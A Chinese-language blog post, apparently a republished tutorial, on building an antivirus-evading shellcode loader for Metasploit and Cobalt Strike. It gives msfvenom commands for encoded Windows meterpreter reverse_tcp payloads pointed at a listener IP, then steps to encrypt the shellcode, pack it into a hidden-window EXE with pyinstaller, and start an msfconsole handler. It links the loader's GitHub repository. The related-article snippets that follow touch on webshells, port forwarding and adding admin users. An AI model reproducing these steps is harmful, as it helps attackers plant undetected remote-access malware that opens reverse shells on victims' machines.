CS/MSF免杀ShellCode加载器

VSole2023-06-05 09:25:16

生成Payload

Metasploit,输出c、py格式,可用xor、xor_dynamic、zutto_dekiru编码器。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload.c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o  payload_py.c
msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_xor.c
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_xor_dynamic.c
msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_zutto_dekiru.c

CobaltStrike,这里选择使用x64的C语言或Python语言的Shellcode。

得到一个payload.c的文件,内容为:

加密Payload

Shellcode_encryption.exe payload_c.c

配置ShellCode加载器

将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处 示例:

最终格式:

打包EXE可执行程序

编译环境:Python 3.8.6、pyinstaller 4.7,生成ShellCode_Loader.exe在dist目录中。

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
pyinstaller -F -w ShellCode_Loader.py

上线测试

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

下载地址

https://github.com/Axx8/ShellCode_Loader

msfhandler
本作品采用《CC 协议》,转载必须注明作者和本文链接
内网渗透合集(三)
2023-01-28 09:44:16
jsp端口转发渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造 LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。在这里发布出来,小伙伴们使用过程中,如果发现什么bug欢迎提交哈~参数说明/KPortTran.jsp?lip = local ip / 本地ip //一般为内网主机IP. lp = local port / 本地端口 //一般为内网主机端口
因为 web 服务器同时连接了外网和内网,所以必须首先拿下。这里有关 web 服务器的渗透不展开讲了,无非也就是利用漏洞,诸如:弱口令、上传漏洞、远程代码执行、各种 cms 漏洞,总之都是可以找到写入 webshell 的方法。成功写入 webshell 后,接着就要上传木马控制 web 服务器,这里可以用 Metasploit或 Cobaltstrike。
前两天朋友分享了一个实验靶场,感觉环境还不错,于是对测试过程进行了详细记录。
MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击者可以利用此会话完成攻击控制靶机。
msf提权简单利用
2023-06-06 09:03:11
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。将创建的用户添加到远程连接组net localgroup Administrators username /add 将创建的用户添加到管理员组然后即可通过远程登录进入本机进行远程连接至此实验成功!
0x00写在前面本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!很快会被检测发现,防守方对攻击流量回溯分析,就会阻断攻击行为。针对加密流量的检测,传统的基于特征的检测已经无法满足攻击发展的趋势,只有通过不断引入新的检测思考才能解决。
msf是一个免费框架,可用命令生成一个可监听的木马程序。
生成PayloadMetasploit,输出c、py格式,可用xor、xor_dynamic、zutto_dekiru编码器。CobaltStrike,这里选择使用x64的C语言或Python语言的Shellcode。
本文详细介绍在metasploit-framework中云函数的使用方法及相关技巧,希望通过本文能够对红队同学在红蓝对抗过程中有所帮助。或者设置对应告警,一旦红队人员使用云函数上线,防守方马上就能定位到哪台机器已经失陷,然后修复漏洞。session 1是使用云函数上线时的效果,只能获取到云函数的网关IP。
MSF监听设置use?PAYLOAD?name>set?LHOST?192.168.20.128set?LPORT?4444show?options?#查漏补缺exploit
VSole
网络安全专家